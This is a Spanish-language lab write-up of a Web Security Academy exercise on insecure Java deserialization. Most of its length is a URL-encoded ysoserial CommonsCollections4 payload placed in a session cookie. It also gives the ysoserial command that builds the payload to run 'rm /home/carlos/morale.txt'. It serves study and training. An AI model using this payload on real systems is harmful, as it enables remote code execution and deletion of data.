33%56%30%61%57%77%76%52%32%46%6b%5a%32%56%30%63%79%52%47%62%32%38%37%41%51%41%4b%55%32%39%31%63%6d%4e%6c%52%6d%6c%73%5a%51%45%41%44%45%64%68%5a%47%64%6c%64%48%4d%75%61%6d%46%32%59%51%77%41%43%67%41%4c%0a%42%77%41%61%41%51%41%6a%65%58%4e%76%63%32%56%79%61%57%46%73%4c%33%42%68%65%57%78%76%59%57%52%7a%4c%33%56%30%61%57%77%76%52%32%46%6b%5a%32%56%30%63%79%52%47%62%32%38%42%41%42%42%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%0a%5a%57%4e%30%41%51%41%55%61%6d%46%32%59%53%39%70%62%79%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%69%62%47%55%42%41%42%39%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%0a%5a%58%52%7a%41%43%45%41%41%67%41%44%41%41%45%41%42%41%41%42%41%42%6f%41%42%51%41%47%41%41%45%41%42%77%41%41%41%41%49%41%43%41%41%42%41%41%45%41%43%67%41%4c%41%41%45%41%44%41%41%41%41%43%38%41%41%51%41%42%41%41%41%41%42%53%71%33%0a%41%41%47%78%41%41%41%41%41%67%41%4e%41%41%41%41%42%67%41%42%41%41%41%41%50%41%41%4f%41%41%41%41%44%41%41%42%41%41%41%41%42%51%41%50%41%42%49%41%41%41%41%43%41%42%4d%41%41%41%41%43%41%42%51%41%45%51%41%41%41%41%6f%41%41%51%41%43%0a%41%42%59%41%45%41%41%4a%63%48%51%41%42%46%42%33%62%6e%4a%77%64%77%45%41%65%48%56%79%41%42%4a%62%54%47%70%68%64%6d%45%75%62%47%46%75%5a%79%35%44%62%47%46%7a%63%7a%75%72%46%74%65%75%79%38%31%61%6d%51%49%41%41%48%68%77%41%41%41%41%0a%41%58%5a%79%41%42%31%71%59%58%5a%68%65%43%35%34%62%57%77%75%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%4c%6c%52%6c%62%58%42%73%59%58%52%6c%63%77%41%41%41%41%41%41%41%41%41%41%41%41%41%41%65%48%42%33%42%41%41%41%41%41%4e%7a%63%67%41%52%0a%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%6c%75%64%47%56%6e%5a%58%49%53%34%71%43%6b%39%34%47%48%4f%41%49%41%41%55%6b%41%42%58%5a%68%62%48%56%6c%65%48%49%41%45%47%70%68%64%6d%45%75%62%47%46%75%5a%79%35%4f%64%57%31%69%5a%58%4b%47%0a%72%4a%55%64%43%35%54%67%69%77%49%41%41%48%68%77%41%41%41%41%41%58%45%41%66%67%41%70%65%41%3d%3d

Y la peticion de BurpSuite deberia de quedar algo asi:

GET /my-account?id=wiener HTTP/2
Host: 0a59004a03268b74811f8bb700ce0086.web-security-academy.net
Cookie: session=%72%4f%30%41%42%58%4e%79%41%42%64%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%55%48%4a%70%62%33%4a%70%64%48%6c%52%64%57%56%31%5a%5a%54%61%4d%4c%54%37%50%34%4b%78%41%77%41%43%53%51%41%45%63%32%6c%36%5a%55%77%41%43%6d%4e%76%62%58%42%68%0a%63%6d%46%30%62%33%4a%30%41%42%5a%4d%61%6d%46%32%59%53%39%31%64%47%6c%73%4c%30%4e%76%62%58%42%68%63%6d%46%30%62%33%49%37%65%48%41%41%41%41%41%43%63%33%49%41%51%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%0a%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%61%57%35%6e%51%32%39%74%63%47%46%79%59%58%52%76%63%69%2f%35%68%50%41%72%73%51%6a%4d%0a%41%67%41%43%54%41%41%4a%5a%47%56%6a%62%33%4a%68%64%47%56%6b%63%51%42%2b%41%41%46%4d%41%41%74%30%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6e%51%41%4c%55%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%0a%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%63%33%49%41%51%47%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%0a%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%51%32%39%74%63%47%46%79%59%57%4a%73%5a%55%4e%76%62%58%42%68%63%6d%46%30%62%33%4c%37%39%4a%6b%6c%75%47%36%78%4e%77%49%41%41%48%68%77%63%33%49%41%4f%32%39%79%0a%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%0a%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%75%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%0a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%64%58%49%41%4c%6c%74%4d%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%0a%4e%43%35%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%73%35%67%54%72%37%43%4e%6f%2f%70%51%49%41%41%48%68%77%41%41%41%41%41%6e%4e%79%41%44%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%0a%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%0a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%0a%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%32%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%0a%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%53%57%35%7a%64%47%46%75%64%47%6c%68%64%47%56%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%53%4c%39%48%2b%6b%0a%68%74%41%37%41%67%41%43%57%77%41%46%61%55%46%79%5a%33%4e%30%41%42%4e%62%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%37%57%77%41%4c%61%56%42%68%63%6d%46%74%56%48%6c%77%5a%58%4e%30%41%42%4a%62%54%47%70%68%0a%64%6d%45%76%62%47%46%75%5a%79%39%44%62%47%46%7a%63%7a%74%34%63%48%56%79%41%42%4e%62%54%47%70%68%64%6d%45%75%62%47%46%75%5a%79%35%50%59%6d%70%6c%59%33%51%37%6b%4d%35%59%6e%78%42%7a%4b%57%77%43%41%41%42%34%63%41%41%41%41%41%46%7a%0a%63%67%41%36%59%32%39%74%4c%6e%4e%31%62%69%35%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6e%68%68%62%47%46%75%4c%6d%6c%75%64%47%56%79%62%6d%46%73%4c%6e%68%7a%62%48%52%6a%4c%6e%52%79%59%58%67%75%56%47%56%74%63%47%78%68%64%47%56%7a%0a%53%57%31%77%62%41%6c%58%54%38%46%75%72%4b%73%7a%41%77%41%47%53%51%41%4e%58%32%6c%75%5a%47%56%75%64%45%35%31%62%57%4a%6c%63%6b%6b%41%44%6c%39%30%63%6d%46%75%63%32%78%6c%64%45%6c%75%5a%47%56%34%57%77%41%4b%58%32%4a%35%64%47%56%6a%0a%62%32%52%6c%63%33%51%41%41%31%74%62%51%6c%73%41%42%6c%39%6a%62%47%46%7a%63%33%45%41%66%67%41%55%54%41%41%46%58%32%35%68%62%57%56%30%41%42%4a%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%74%4d%41%42%46%66%0a%62%33%56%30%63%48%56%30%55%48%4a%76%63%47%56%79%64%47%6c%6c%63%33%51%41%46%6b%78%71%59%58%5a%68%4c%33%56%30%61%57%77%76%55%48%4a%76%63%47%56%79%64%47%6c%6c%63%7a%74%34%63%41%41%41%41%41%44%2f%2f%2f%2f%2f%64%58%49%41%41%31%74%62%0a%51%6b%76%39%47%52%56%6e%5a%39%73%33%41%67%41%41%65%48%41%41%41%41%41%43%64%58%49%41%41%6c%74%43%72%50%4d%58%2b%41%59%49%56%4f%41%43%41%41%42%34%63%41%41%41%42%71%37%4b%2f%72%71%2b%41%41%41%41%4d%67%41%35%43%67%41%44%41%43%49%48%0a%41%44%63%48%41%43%55%48%41%43%59%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%72%53%43%54%38%35%48%64%37%7a%34%42%0a%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%0a%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%45%31%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%42%41%41%78%4a%62%6d%35%6c%63%6b%4e%73%59%58%4e%7a%5a%58%4d%42%41%44%56%4d%65%58%4e%76%63%32%56%79%0a%61%57%46%73%4c%33%42%68%65%57%78%76%59%57%52%7a%4c%33%56%30%61%57%77%76%52%32%46%6b%5a%32%56%30%63%79%52%54%64%48%56%69%56%48%4a%68%62%6e%4e%73%5a%58%52%51%59%58%6c%73%62%32%46%6b%4f%77%45%41%43%58%52%79%59%57%35%7a%5a%6d%39%79%0a%62%51%45%41%63%69%68%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%74%62%54%47%4e%76%62%53%39%7a%0a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%0a%63%6a%73%70%56%67%45%41%43%47%52%76%59%33%56%74%5a%57%35%30%41%51%41%74%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%0a%59%79%39%45%54%30%30%37%41%51%41%49%61%47%46%75%5a%47%78%6c%63%6e%4d%42%41%45%4a%62%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%0a%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6a%73%42%41%41%70%46%65%47%4e%6c%63%48%52%70%62%32%35%7a%42%77%41%6e%41%51%43%6d%4b%45%78%6a%62%32%30%76%63%33%56%75%0a%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%30%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%0a%65%47%31%73%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%32%52%30%62%53%39%45%56%45%31%42%65%47%6c%7a%53%58%52%6c%63%6d%46%30%62%33%49%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%0a%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6a%73%70%56%67%45%41%43%47%6c%30%5a%58%4a%68%64%47%39%79%41%51%41%31%0a%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%73%42%41%41%64%6f%0a%59%57%35%6b%62%47%56%79%41%51%42%42%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%63%32%56%79%61%57%46%73%61%58%70%6c%63%69%39%54%5a%58%4a%70%0a%59%57%78%70%65%6d%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%43%67%42%41%44%4e%35%0a%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%42%41%45%42%6a%62%32%30%76%0a%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%63%6e%56%75%64%47%6c%74%5a%53%39%42%59%6e%4e%30%63%6d%46%6a%64%46%52%79%59%57%35%7a%0a%62%47%56%30%41%51%41%55%61%6d%46%32%59%53%39%70%62%79%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%69%62%47%55%42%41%44%6c%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%0a%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%56%48%4a%68%62%6e%4e%73%5a%58%52%46%65%47%4e%6c%63%48%52%70%62%32%34%42%41%42%39%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%0a%59%57%52%6e%5a%58%52%7a%41%51%41%49%50%47%4e%73%61%57%35%70%64%44%34%42%41%42%46%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%6e%56%75%64%47%6c%74%5a%51%63%41%4b%67%45%41%43%6d%64%6c%64%46%4a%31%62%6e%52%70%62%57%55%42%41%42%55%6f%0a%4b%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%6e%56%75%64%47%6c%74%5a%54%73%4d%41%43%77%41%4c%51%6f%41%4b%77%41%75%41%51%41%61%63%6d%30%67%4c%32%68%76%62%57%55%76%59%32%46%79%62%47%39%7a%4c%32%31%76%63%6d%46%73%5a%53%35%30%0a%65%48%51%49%41%44%41%42%41%41%52%6c%65%47%56%6a%41%51%41%6e%4b%45%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%79%6c%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%42%79%62%32%4e%6c%63%33%4d%37%44%41%41%79%0a%41%44%4d%4b%41%43%73%41%4e%41%45%41%44%56%4e%30%59%57%4e%72%54%57%46%77%56%47%46%69%62%47%55%42%41%42%31%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%44%51%7a%4e%44%6b%30%4e%6a%4d%31%4e%44%51%30%4e%67%45%41%0a%48%30%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%44%51%7a%4e%44%6b%30%4e%6a%4d%31%4e%44%51%30%4e%6a%73%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%0a%41%67%41%49%41%41%51%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%76%41%41%34%41%41%41%41%4d%41%41%45%41%0a%41%41%41%46%41%41%38%41%4f%41%41%41%41%41%45%41%45%77%41%55%41%41%49%41%44%41%41%41%41%44%38%41%41%41%41%44%41%41%41%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%30%41%41%34%41%41%41%41%67%41%41%4d%41%0a%41%41%41%42%41%41%38%41%4f%41%41%41%41%41%41%41%41%51%41%56%41%42%59%41%41%51%41%41%41%41%45%41%46%77%41%59%41%41%49%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%45%41%45%77%41%62%41%41%49%41%44%41%41%41%41%45%6b%41%41%41%41%45%0a%41%41%41%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%34%41%41%34%41%41%41%41%71%41%41%51%41%41%41%41%42%41%41%38%41%4f%41%41%41%41%41%41%41%41%51%41%56%41%42%59%41%41%51%41%41%41%41%45%41%48%41%41%64%0a%41%41%49%41%41%41%41%42%41%42%34%41%48%77%41%44%41%42%6b%41%41%41%41%45%41%41%45%41%47%67%41%49%41%43%6b%41%43%77%41%42%41%41%77%41%41%41%41%6b%41%41%4d%41%41%67%41%41%41%41%2b%6e%41%41%4d%42%54%4c%67%41%4c%78%49%78%74%67%41%31%0a%56%37%45%41%41%41%41%42%41%44%59%41%41%41%41%44%41%41%45%44%41%41%49%41%49%41%41%41%41%41%49%41%49%51%41%52%41%41%41%41%43%67%41%42%41%41%49%41%49%77%41%51%41%41%6c%31%63%51%42%2b%41%42%38%41%41%41%48%55%79%76%36%36%76%67%41%41%0a%41%44%49%41%47%77%6f%41%41%77%41%56%42%77%41%58%42%77%41%59%42%77%41%5a%41%51%41%51%63%32%56%79%61%57%46%73%56%6d%56%79%63%32%6c%76%62%6c%56%4a%52%41%45%41%41%55%6f%42%41%41%31%44%62%32%35%7a%64%47%46%75%64%46%5a%68%62%48%56%6c%0a%42%58%48%6d%61%65%34%38%62%55%63%59%41%51%41%47%50%47%6c%75%61%58%51%2b%41%51%41%44%4b%43%6c%57%41%51%41%45%51%32%39%6b%5a%51%45%41%44%30%78%70%62%6d%56%4f%64%57%31%69%5a%58%4a%55%59%57%4a%73%5a%51%45%41%45%6b%78%76%59%32%46%73%0a%56%6d%46%79%61%57%46%69%62%47%56%55%59%57%4a%73%5a%51%45%41%42%48%52%6f%61%58%4d%42%41%41%4e%47%62%32%38%42%41%41%78%4a%62%6d%35%6c%63%6b%4e%73%59%58%4e%7a%5a%58%4d%42%41%43%56%4d%65%58%4e%76%63%32%56%79%61%57%46%73%4c%33%42%68%0a%65%57%78%76%59%57%52%7a%4c%33%56%30%61%57%77%76%52%32%46%6b%5a%32%56%30%63%79%52%47%62%32%38%37%41%51%41%4b%55%32%39%31%63%6d%4e%6c%52%6d%6c%73%5a%51%45%41%44%45%64%68%5a%47%64%6c%64%48%4d%75%61%6d%46%32%59%51%77%41%43%67%41%4c%0a%42%77%41%61%41%51%41%6a%65%58%4e%76%63%32%56%79%61%57%46%73%4c%33%42%68%65%57%78%76%59%57%52%7a%4c%33%56%30%61%57%77%76%52%32%46%6b%5a%32%56%30%63%79%52%47%62%32%38%42%41%42%42%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%0a%5a%57%4e%30%41%51%41%55%61%6d%46%32%59%53%39%70%62%79%39%54%5a%58%4a%70%59%57%78%70%65%6d%46%69%62%47%55%42%41%42%39%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%0a%5a%58%52%7a%41%43%45%41%41%67%41%44%41%41%45%41%42%41%41%42%41%42%6f%41%42%51%41%47%41%41%45%41%42%77%41%41%41%41%49%41%43%41%41%42%41%41%45%41%43%67%41%4c%41%41%45%41%44%41%41%41%41%43%38%41%41%51%41%42%41%41%41%41%42%53%71%33%0a%41%41%47%78%41%41%41%41%41%67%41%4e%41%41%41%41%42%67%41%42%41%41%41%41%50%41%41%4f%41%41%41%41%44%41%41%42%41%41%41%41%42%51%41%50%41%42%49%41%41%41%41%43%41%42%4d%41%41%41%41%43%41%42%51%41%45%51%41%41%41%41%6f%41%41%51%41%43%0a%41%42%59%41%45%41%41%4a%63%48%51%41%42%46%42%33%62%6e%4a%77%64%77%45%41%65%48%56%79%41%42%4a%62%54%47%70%68%64%6d%45%75%62%47%46%75%5a%79%35%44%62%47%46%7a%63%7a%75%72%46%74%65%75%79%38%31%61%6d%51%49%41%41%48%68%77%41%41%41%41%0a%41%58%5a%79%41%42%31%71%59%58%5a%68%65%43%35%34%62%57%77%75%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%4c%6c%52%6c%62%58%42%73%59%58%52%6c%63%77%41%41%41%41%41%41%41%41%41%41%41%41%41%41%65%48%42%33%42%41%41%41%41%41%4e%7a%63%67%41%52%0a%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%6c%75%64%47%56%6e%5a%58%49%53%34%71%43%6b%39%34%47%48%4f%41%49%41%41%55%6b%41%42%58%5a%68%62%48%56%6c%65%48%49%41%45%47%70%68%64%6d%45%75%62%47%46%75%5a%79%35%4f%64%57%31%69%5a%58%4b%47%0a%72%4a%55%64%43%35%54%67%69%77%49%41%41%48%68%77%41%41%41%41%41%58%45%41%66%67%41%70%65%41%3d%3d
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not(A:Brand";v="99", "Google Chrome";v="133", "Chromium";v="133"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Referer: https://0a59004a03268b74811f8bb700ce0086.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=0, i

Ahora si la enviamos veremos lo siguiente:

Con este mensaje veremos que el comando se ejecuto de forma correcta, por lo que habremos aprovechado dicha vulnerabilidad.

Explicación detallada sobre la técnica

1. ¿Qué es la deserialización y cómo puede ser explotada?

La deserialización es el proceso de convertir datos serializados (generalmente en forma de una cadena de bytes o un archivo) de vuelta a un objeto en memoria en el servidor. Las aplicaciones web que usan Java suelen deserializar estos datos de objetos enviados por los clientes (en tu caso, probablemente una cookie de sesión).

Sin embargo, si este proceso no se maneja de forma segura, puede ser vulnerable a ataques. Un atacante puede manipular los datos serializados (como la cookie de sesión) para incluir un payload malicioso, que, al ser deserializado en el servidor, ejecuta código malicioso. Si el servidor no valida correctamente los datos deserializados, podría ejecutar un comando peligroso (por ejemplo, eliminar archivos, ejecutar programas, etc.).

2. ¿Por qué se considera vulnerable?

En este caso, el servidor está utilizando bibliotecas de deserialización inseguras, como las que se encuentran en Apache Commons (una de las más comunes). Si un atacante logra enviar un objeto malicioso como parte de la solicitud (por ejemplo, a través de una cookie), el servidor, al deserializar ese objeto, podría ejecutar código malicioso.

El payload que envías (como el comando rm /home/carlos/morale.txt) tiene como objetivo eliminar un archivo del sistema como prueba de que el código malicioso fue ejecutado con éxito. Aunque el servidor no haya ejecutado el comando completamente, el hecho de que haya intentado ejecutarlo indica que la vulnerabilidad fue explotada correctamente.

3. Generación del Payload:

Para explotar esta vulnerabilidad, utilizaste una herramienta llamada ysoserial, que está diseñada para generar objetos serializados maliciosos que aprovechan las vulnerabilidades de deserialización en bibliotecas populares. Específicamente, usaste CommonsCollections4, una de las clases más comúnmente afectadas.

El comando que ejecutaste fue:

java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

Este comando genera un payload que, cuando se deserializa en el servidor, intenta ejecutar el comando de eliminación del archivo. El payload generado es un objeto Java serializado que se convierte en una cadena de texto en Base64 para que pueda ser transmitido de manera segura como parte de una URL.

El siguiente paso fue codificar el payload en URL encoding para asegurarse de que se pueda enviar correctamente en una solicitud HTTP:

%72%4f%30%41%42%58%4e%79%41%42%64%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%55%48%4a%70%62%33%4a%70%64...

Este es el payload codificado que se envía en la cookie de la sesión.

4. ¿Por qué ocurre el Internal Server Error (Error 500)?

Cuando el servidor recibe la solicitud con el payload malicioso y lo deserializa, se enfrenta al comando malicioso que le indicaste (rm /home/carlos/morale.txt). Si algo sale mal en este proceso, como un fallo en la ejecución del comando o problemas en la deserialización de objetos, el servidor podría devolver un Internal Server Error (HTTP 500).

Este error puede ocurrir por varias razones:

Fallo en la ejecución del comando: Si el comando rm no tiene los permisos necesarios para ejecutarse, o si el archivo morale.txt no existe en el sistema, el comando podría fallar, lo que genera un error 500.
Inestabilidad del servidor: Si la deserialización del payload afecta la estabilidad del servidor o la integridad de los objetos en memoria, esto podría llevar a un fallo del servidor, causando el error 500.
Excepciones internas: Si el servidor intenta acceder a recursos o ejecutar métodos en objetos deserializados de manera incorrecta, podrían producirse excepciones internas que desencadenan el error 500.

El hecho de que hayas obtenido un error 500 es importante porque confirma que el payload fue procesado por el servidor. Esto indica que el servidor intentó ejecutar el código malicioso, aunque no lo haya logrado con éxito. El error 500 es una señal de que la deserialización falló, pero la vulnerabilidad en el proceso de deserialización fue explotada correctamente.

PreviousSerialización/Deserialización NextDeserialización Insegura (PHP, Python y Java)

Last updated 2 months ago